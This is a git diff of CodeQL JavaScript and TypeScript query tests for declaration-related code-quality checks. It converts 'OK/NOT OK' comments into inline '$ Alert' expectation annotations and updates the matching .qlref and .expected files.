b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -1,8 +1,8 @@ /*global w, x:true*/ /* global y*/ // not a proper JSLint global declaration, but we (and JSHint) accept it anyway /*global: z*/ // also not a proper global declaration -w; // OK -x; // OK -y; // not OK -z; // not OK +w; +x; +y; +z; // $ Alert var x, y, z; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js index 2fb118b1541e..2808e89550f5 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/tst2.js @@ -1,11 +1,11 @@ function f(x) { - console.log(x); // OK + console.log(x); } -console.log(x); // NOT OK +console.log(x); // $ Alert var x = 1; function g() { - console.log(y); // OK (not in same function) + console.log(y); // OK - not in same function } var y = 1; diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts index 0de18d48a482..f949cd26fc76 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/typescript.ts @@ -1,7 +1,7 @@ -@Component(Foo) // OK +@Component(Foo) class Foo {} -declare class Bar extends Baz {} // OK +declare class Bar extends Baz {} declare class Baz {} export type { I }; // OK - does not refer to the constant 'I' diff --git a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref index da8c0e499f5f..25a417d4cc8c 100644 --- a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref +++ b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/DefaultArgumentReferencesNestedFunction.qlref @@ -1 +1,2 @@ -Declarations/DefaultArgumentReferencesNestedFunction.ql \ No newline at end of file +query: Declarations/DefaultArgumentReferencesNestedFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js index 4696ab7b54c3..652af0051b51 100644 --- a/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DefaultArgumentReferencesNestedFunction/tst.js @@ -1,4 +1,4 @@ -function f(x, y = defaultVal(x)) { +function f(x, y = defaultVal(x)) { // $ Alert function defaultVal(x) { return x+19; } diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref index f3b921510036..464ae67871c4 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.qlref @@ -1 +1,2 @@ -Declarations/DuplicateVarDecl.ql \ No newline at end of file +query: Declarations/DuplicateVarDecl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js index 5014f7d5dbf3..0b5ef32b81a7 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/tst.js @@ -1,7 +1,6 @@ -// NOT OK -var a, b, a = 42; +var a, b, a = 42; // $ Alert + -// OK var x; var y; var x; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref index 6c8915bdd08c..33e0ddb6ffe1 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/IneffectiveParameterType.qlref @@ -1 +1,2 @@ -Declarations/IneffectiveParameterType.ql +query: Declarations/IneffectiveParameterType.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js index 8ace9c1472ab..96cb2578e3d2 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.js @@ -1 +1 @@ -function getStuff(number) {} // OK: don't report anything related type annotations in .js files +function getStuff(number) {} // OK - don't report anything related type annotations in .js files diff --git a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts index 5aadd17c4d58..a9713de9685e 100644 --- a/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/IneffectiveParameterType/tst.ts @@ -1,36 +1,36 @@ import { MyType, x } from 'somewhere'; -function join(items: T[], callback: (T) => string) { // NOT OK: (T) should be (x:T) +function join(items: T[], callback: (T) => string) { // $ Alert - (T) should be (x:T) return items.map(callback).join(", ") } -var box : (T) => T[] = (x) => [x]; // NOT OK: (T) should be (x:T) +var box : (T) => T[] = (x) => [x]; // $ Alert - (T) should be (x:T) interface EventEmitter { - addListener(listener: (T) => void): void; // NOT OK: (T) should be (x:T) - forwardFrom(other: EventEmitter, converter: (S) => T); // NOT OK: (S) should be (x:S) + addListener(listener: (T) => void): void; // $ Alert - (T) should be (x:T) + forwardFrom(other: EventEmitter, converter: (S) => T); // $ Alert - (S) should be (x:S) } interface NumberFormatter { - format(number): string; // NOT OK: (number) should be (x:number) - (number): string; // NOT OK: (number) should be (x:number) + format(number): string; // $ Alert - (number) should be (x:number) + (number): string; // $ Alert - (number) should be (x:number) } -type TextFormatter = (NumberFormatter) => string; // NOT OK: (NumberFormatter) should be (x:NumberFormatter) +type TextFormatter = (NumberFormatter) => string; // $ Alert - (NumberFormatter) should be (x:NumberFormatter) var myGlobal : MyType; -var myCallback: (MyType) => void; // NOT OK: (MyType) should be (x:MyType) +var myCallback: (MyType) => void; // $ Alert - (MyType) should be (x:MyType) -var myOtherCallback : (x) => void; // OK: nothing indicates that 'x' is a type name. +var myOtherCallback : (x) => void; // OK - nothing indicates that 'x' is a type name. interface Repeated { x: number; } interface Repeated { y: number; } interface Repeated { z: number; } -type Callback = (Repeated) => void; // NOT OK: but should only be reported once +type Callback = (Repeated) => void; // $ Alert - but should only be reported once class C { - getName(string) { // OK: parameter name is not part of signature + getName(string) { // OK - parameter name is not part of signature return null; } } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected @@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref index 0dc32a588efb..510e68bd8977 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.qlref @@ -1 +1,2 @@ -Declarations/MissingThisQualifier.ql \ No newline at end of file +query: Declarations/MissingThisQualifier.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts index dedc0b8c9601..a81bfd9a96d4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/abstract-missing.ts @@ -1,6 +1,6 @@ abstract class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } abstract setAudioProperties(); diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js index 78e0637b1b31..7af69ca17e4d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-externs.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - externs_setAudioProperties(); // OK + externs_setAudioProperties(); } externs_setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js index c8d8436ab5fe..24894c816cb1 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js index 086a8ba03c28..c55f8d03ae34 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/indirection.js @@ -1,9 +1,9 @@ class X { m() { - m("default"); // OK + m("default"); } resty(...x) { - m("default"); // NOT OK + m("default"); // $ Alert } } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js index b7810e851eef..967d2ddf165b 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js index f0fa436f80b0..a7e9c39ae849 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/missing2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts index 96d83d9f12ac..2000aa1b4b72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/namespaces-uses.ts @@ -1,39 +1,39 @@ class GlobalClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // NOT OK + topNamespaceFunction() { + topNamespaceFunction(); // $ Alert } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK + childNamespaceFunction() { + childNamespaceFunction(); // $ Alert } } namespace Top { class TopClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // NOT OK, but not flagged since the namespace resolution is ignored + childNamespaceFunction() { + childNamespaceFunction(); // $ MISSING: Alert - not flagged since the namespace resolution is ignored } } } namespace Top.Child { class ChildClass { - globalFunction(){ - globalFunction(); // NOT OK + globalFunction() { + globalFunction(); // $ Alert } - topNamespaceFunction(){ - topNamespaceFunction(); // OK + topNamespaceFunction() { + topNamespaceFunction(); } - childNamespaceFunction(){ - childNamespaceFunction(); // OK + childNamespaceFunction() { + childNamespaceFunction(); } } -} \ No newline at end of file +} diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js index e69101b80fd7..00fd5f8f67c4 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/non-global.js @@ -2,7 +2,7 @@ function setAudioProperties(){} class Audio3D { setAudioStream() { - setAudioProperties(); // OK + setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js index 4920a96353fe..0d80afa72a8d 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/not-ignored-by-jslint.js @@ -1,7 +1,7 @@ /*global NOT_setAudioProperties*/ class Audio3D { setAudioStream() { - setAudioProperties(); // NOT OK + setAudioProperties(); // $ Alert } setAudioProperties(){ diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js index e5cd1e1c3b41..559d4f3d75f8 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present1.js @@ -1,6 +1,6 @@ class Audio3D { setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js index a55bb69e5965..396266bb6c72 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/present2.js @@ -1,6 +1,6 @@ class Audio3D { static setAudioStream() { - this.setAudioProperties(); // OK + this.setAudioProperties(); } diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected @@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref index 47259d4307ed..05c15790bd10 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.qlref @@ -1 +1,2 @@ -Declarations/MissingVarDecl.ql \ No newline at end of file +query: Declarations/MissingVarDecl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js index 5c4444111759..77c37017ec3a 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/test.js @@ -2,26 +2,23 @@ var x; function f(a) { var sum = 0; - // NOT OK - for (i=0; i void; // OK! This is a property, not a method, we ignore those. - constructor(): string; // NOT OK! This a called "constructor" - new(): Date; // OK! This a constructor signature. + function (): number; // OK - Highly unlikely that it is an accident when there are other named methods in the interface. + (): number; // OK - What was probably meant above. + new:() => void; // OK - This is a property, not a method, we ignore those. + constructor(): string; // $ Alert - This a called "constructor" + new(): Date; // OK - This a constructor signature. myNumber: 123; } @@ -13,15 +13,15 @@ interface MyInterface { var a : MyFunction = null as any; interface MyFunction { - function(): number; // NOT OK! + function(): number; // $ Alert } class Foo { - new(): number { // OK! Highly unlikely that a developer confuses "constructor" and "new" when both are present. + new(): number { // OK - Highly unlikely that a developer confuses "constructor" and "new" when both are present. return 123; } - constructor() { // OK! This is a constructor. + constructor() { // OK - This is a constructor. } myString = "foobar" @@ -34,18 +34,18 @@ class Foo { var b : FunctionClass = new FunctionClass(); declare class FunctionClass { - function(): number; // NOT OK: + function(): number; // $ Alert } class Baz { - new(): Baz { // OK! When there is a method body I assume the developer knows what they are doing. + new(): Baz { // OK - When there is a method body I assume the developer knows what they are doing. return null as any; } } declare class Quz { - new(): Quz; // NOT OK! The developer likely meant to write constructor. + new(): Quz; // $ Alert - The developer likely meant to write constructor. } var bla = new Foo(); diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref index 11d29c61b707..260ac43bc943 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.qlref @@ -1 +1,2 @@ -Declarations/TemporalDeadZone.ql \ No newline at end of file +query: Declarations/TemporalDeadZone.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js index cb665103c1da..2ee068482544 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/tst.js @@ -1,27 +1,26 @@ function f() { - // NOT OK - s = null; + s = null; // $ Alert let s = "hi"; - // OK + s = "hello"; } function g() { - // OK + s = null; var s = "hi"; - // OK + s = "hello"; } function do_something() { - // OK + let foo; let foo; } function do_something() { - // OK + let foo; foo = "bar"; let foo; @@ -29,7 +28,7 @@ function do_something() { if (true) { // enter new scope, TDZ starts const func = function () { - console.log(myVar); // OK! + console.log(myVar); }; function otherfunc() { diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected index 6ecb8a664d32..8568ca6705d1 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.expected @@ -1 +1 @@ -| excessiveParameterList.js:4:1:4:48 | functio ... p8) {\\n} | Function func2 has too many parameters (8). | +| excessiveParameterList.js:4:1:4:59 | functio ... Alert\\n} | Function func2 has too many parameters (8). | diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref index 7f245bdda92e..00dcfc5b70a1 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/TooManyParameters.qlref @@ -1 +1,2 @@ -Declarations/TooManyParameters.ql +query: Declarations/TooManyParameters.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js index 2ff015e35bb7..52a4302d3196 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/excessiveParameterList.js @@ -1,5 +1,5 @@ function func1() { } -function func2(p1, p2, p3, p4, p5, p6, p7, p8) { +function func2(p1, p2, p3, p4, p5, p6, p7, p8) { // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js index 4327b4885f59..6881d51be716 100644 --- a/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js +++ b/javascript/ql/test/query-tests/Declarations/TooManyParameters/externs.js @@ -1,4 +1,4 @@ -// OK: overly long parameter lists in external APIs aren't the fault of the externs definitions +// OK - overly long parameter lists in external APIs aren't the fault of the externs definitions function f(a, b, c, d, e, f, g, h) {} /** @externs */ \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref index a6cbbd4df634..f78c9c3afc28 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/UniqueParameterNames.qlref @@ -1 +1,2 @@ -Declarations/UniqueParameterNames.ql +query: Declarations/UniqueParameterNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js index 1779be95e365..1e814fe219df 100644 --- a/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniqueParameterNames/tst.js @@ -1,21 +1,21 @@ function f( -x, -x, // NOT OK -\u0078 // NOT OK +x, // $ Alert +x, // $ Alert +\u0078 ) { return; } this.addPropertyListener(prop.name, function(_, _, _, a) { proxy.delegate = a.dao; }); -// OK: for strict mode functions, duplicate parameter names are a syntax error +// OK - for strict mode functions, duplicate parameter names are a syntax error function f(x, y, x) { 'use strict'; } function f( x, -x // OK: empty function +x // OK - empty function ) { } -(a, a) => a + a; // OK: for strict mode functions, duplicate parameter names are a syntax error +(a, a) => a + a; // OK - for strict mode functions, duplicate parameter names are a syntax error diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref index 092a0534a249..770e337950c9 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/UniquePropertyNames.qlref @@ -1 +1,2 @@ -Declarations/UniquePropertyNames.ql +query: Declarations/UniquePropertyNames.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js index a8a5fe4bb7b9..fe6c4a97b13b 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst.js @@ -17,9 +17,9 @@ var accessors = { }; var clobbering = { - x: 23, // NOT OK: clobbered by `x: 56` - y: "hello", // NOT OK: clobbered by `"y": "world"` - x: 42, // NOT OK: clobbered by `x: 56` + x: 23, // $ Alert - clobbered by `x: 56` + y: "hello", // $ Alert - clobbered by `"y": "world"` + x: 42, // $ Alert - clobbered by `x: 56` x: 56, "y": "world" } \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js index 6332a235e21e..731b0525c7b8 100644 --- a/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UniquePropertyNames/tst2.js @@ -7,7 +7,7 @@ var o = { setX: function(x) { this.x = x; - }, + }, // $ Alert getX: function() { return this.x; diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref index 37aba2753b2b..b419a3298903 100644 --- 